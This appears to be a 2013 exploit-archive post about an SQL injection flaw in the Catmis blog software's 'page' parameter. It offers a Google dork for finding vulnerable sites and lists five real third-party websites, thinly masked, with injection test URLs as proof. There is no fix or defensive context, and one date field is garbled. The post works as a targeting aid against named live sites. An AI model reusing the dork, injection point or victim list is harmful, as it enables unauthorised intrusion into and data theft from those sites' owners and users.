Home / exploits Catmis Sql Injection Vulnerability
Posted on 04 November 2013
#******************************************************************************** # Exploit Title : Catmis Sql Injection Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://code.google.com/p/catmis/ # # Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId= # # Date: 2013/11/102 # # Tested on: Windows 7 , Linux ------------------------------------------------------------------- # Exploit : Sql Injection # # Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection] # ###################### # Proof: # # http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=' # # https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=' # # http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=' # # http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=' # # http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=' # ###################### discovered by : ACC3SS ######################
